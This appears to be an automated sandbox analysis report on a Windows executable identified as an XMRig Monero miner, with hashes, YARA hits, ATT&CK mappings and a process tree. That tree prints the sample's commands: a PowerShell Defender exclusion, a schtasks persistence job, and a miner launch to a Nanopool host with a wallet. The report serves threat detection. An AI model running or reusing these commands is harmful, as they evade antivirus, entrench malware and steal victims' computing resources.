xmrig | dc27f1a2e3285428ddd71705f053ba1fab028608a08a08824720484c30b1ec0e

Analysis

max time kernel
91s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
01-01-2023 15:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

883KB
MD5

1f94ec704a0cf3f5797e538d69e26318
SHA1

b15ada6f73e6d21add6abc46a8e8e5a0a63bbc28
SHA256

dc27f1a2e3285428ddd71705f053ba1fab028608a08a08824720484c30b1ec0e
SHA512

c848c94bd832e7ff8bed30d896838a38b35f22bb74048dec1a19d5032b867732e6de01b334eb9baafa9e6853dc04e1101d763d411f7f14c9634ae3a8efe0d210
SSDEEP

12288:ztVSX3x7FRSJWeOkDPHAgybo+3BouhTRgfHnnbmjwnAD23XIkWK9v8pEIzecVSRu:ztVSn52IxbPeBnblXJRvMFeCJn

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

resource	yara_rule
behavioral2/memory/2448-158-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/2448-159-0x0000000140343234-mapping.dmp	xmrig
behavioral2/memory/2448-160-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/2448-161-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/2448-163-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/2448-165-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	file.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3064 set thread context of 2448	3064	file.exe	94

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1608	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1628	powershell.exe
1628	powershell.exe
3064	file.exe
3064	file.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
652	Process not Found

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3064	file.exe
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeLockMemoryPrivilege	2448	vbc.exe
Token: SeLockMemoryPrivilege	2448	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2448	vbc.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 3064 wrote to memory of 1628	3064	file.exe	82
PID 3064 wrote to memory of 1628	3064	file.exe	82
PID 3064 wrote to memory of 1476	3064	file.exe	90
PID 3064 wrote to memory of 1476	3064	file.exe	90
PID 1476 wrote to memory of 1608	1476	cmd.exe	92
PID 1476 wrote to memory of 1608	1476	cmd.exe	92
PID 3064 wrote to memory of 2448	3064	file.exe	94
PID 3064 wrote to memory of 2448	3064	file.exe	94
PID 3064 wrote to memory of 2448	3064	file.exe	94
PID 3064 wrote to memory of 2448	3064	file.exe	94
PID 3064 wrote to memory of 2448	3064	file.exe	94
PID 3064 wrote to memory of 2448	3064	file.exe	94
PID 3064 wrote to memory of 2448	3064	file.exe	94
PID 3064 wrote to memory of 2448	3064	file.exe	94
PID 3064 wrote to memory of 2448	3064	file.exe	94
PID 3064 wrote to memory of 2448	3064	file.exe	94
PID 3064 wrote to memory of 2448	3064	file.exe	94
PID 3064 wrote to memory of 2448	3064	file.exe	94
PID 3064 wrote to memory of 2448	3064	file.exe	94
PID 3064 wrote to memory of 2448	3064	file.exe	94

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1628
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "REFAP" /tr "C:\ProgramData\winzip\REFAP.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1476
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "REFAP" /tr "C:\ProgramData\winzip\REFAP.exe"
    3⤵
    - Creates scheduled task(s)
    PID:1608
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2448

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1476-152-0x0000000000000000-mapping.dmp

Download
memory/1608-153-0x0000000000000000-mapping.dmp

Download
memory/1628-148-0x00007FF8B3180000-0x00007FF8B3C41000-memory.dmp

Filesize
10.8MB

Download
memory/1628-147-0x000001FC69040000-0x000001FC69062000-memory.dmp

Filesize
136KB

Download
memory/1628-146-0x0000000000000000-mapping.dmp

Download
memory/2448-162-0x000001D034970000-0x000001D034990000-memory.dmp

Filesize
128KB

Download
memory/2448-164-0x000001D036370000-0x000001D0363B0000-memory.dmp

Filesize
256KB

Download
memory/2448-163-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2448-165-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2448-161-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2448-160-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2448-159-0x0000000140343234-mapping.dmp

Download
memory/2448-158-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/2448-168-0x000001D0363B0000-0x000001D0363D0000-memory.dmp

Filesize
128KB

Download
memory/2448-169-0x000001D0C8A30000-0x000001D0C8A50000-memory.dmp

Filesize
128KB

Download
memory/2448-170-0x000001D0363B0000-0x000001D0363D0000-memory.dmp

Filesize
128KB

Download
memory/2448-171-0x000001D0C8A30000-0x000001D0C8A50000-memory.dmp

Filesize
128KB

Download
memory/3064-142-0x0000000000DE0000-0x0000000000F24000-memory.dmp

Filesize
1.3MB

Download
memory/3064-133-0x00007FF8B4170000-0x00007FF8B421A000-memory.dmp

Filesize
680KB

Download
memory/3064-150-0x0000000000DE0000-0x0000000000F24000-memory.dmp

Filesize
1.3MB

Download
memory/3064-149-0x0000000000CC0000-0x0000000000D01000-memory.dmp

Filesize
260KB

Download
memory/3064-154-0x00007FF8ADC60000-0x00007FF8ADC95000-memory.dmp

Filesize
212KB

Download
memory/3064-155-0x00007FF8ADCA0000-0x00007FF8ADDA2000-memory.dmp

Filesize
1.0MB

Download
memory/3064-156-0x00007FF8D0500000-0x00007FF8D056B000-memory.dmp

Filesize
428KB

Download
memory/3064-157-0x00007FF8CE2C0000-0x00007FF8CE2FB000-memory.dmp

Filesize
236KB

Download
memory/3064-145-0x00007FF8CF7F0000-0x00007FF8CF817000-memory.dmp

Filesize
156KB

Download
memory/3064-144-0x00007FF8B3180000-0x00007FF8B3C41000-memory.dmp

Filesize
10.8MB

Download
memory/3064-143-0x00007FF8B3F10000-0x00007FF8B405E000-memory.dmp

Filesize
1.3MB

Download
memory/3064-151-0x00007FF8B3180000-0x00007FF8B3C41000-memory.dmp

Filesize
10.8MB

Download
memory/3064-141-0x00007FF8D0460000-0x00007FF8D048B000-memory.dmp

Filesize
172KB

Download
memory/3064-138-0x00007FF8B3180000-0x00007FF8B3C41000-memory.dmp

Filesize
10.8MB

Download
memory/3064-140-0x0000000000CC0000-0x0000000000D01000-memory.dmp

Filesize
260KB

Download
memory/3064-139-0x0000000000DE0000-0x0000000000F24000-memory.dmp

Filesize
1.3MB

Download
memory/3064-166-0x0000000000DE0000-0x0000000000F24000-memory.dmp

Filesize
1.3MB

Download
memory/3064-167-0x00007FF8B3180000-0x00007FF8B3C41000-memory.dmp

Filesize
10.8MB

Download
memory/3064-137-0x00007FF8D0EE0000-0x00007FF8D1081000-memory.dmp

Filesize
1.6MB

Download
memory/3064-136-0x00007FF8B40B0000-0x00007FF8B416D000-memory.dmp

Filesize
756KB

Download
memory/3064-135-0x00007FF8CCE10000-0x00007FF8CCE22000-memory.dmp

Filesize
72KB

Download
memory/3064-134-0x00007FF8CF9F0000-0x00007FF8CFA8E000-memory.dmp

Filesize
632KB

Download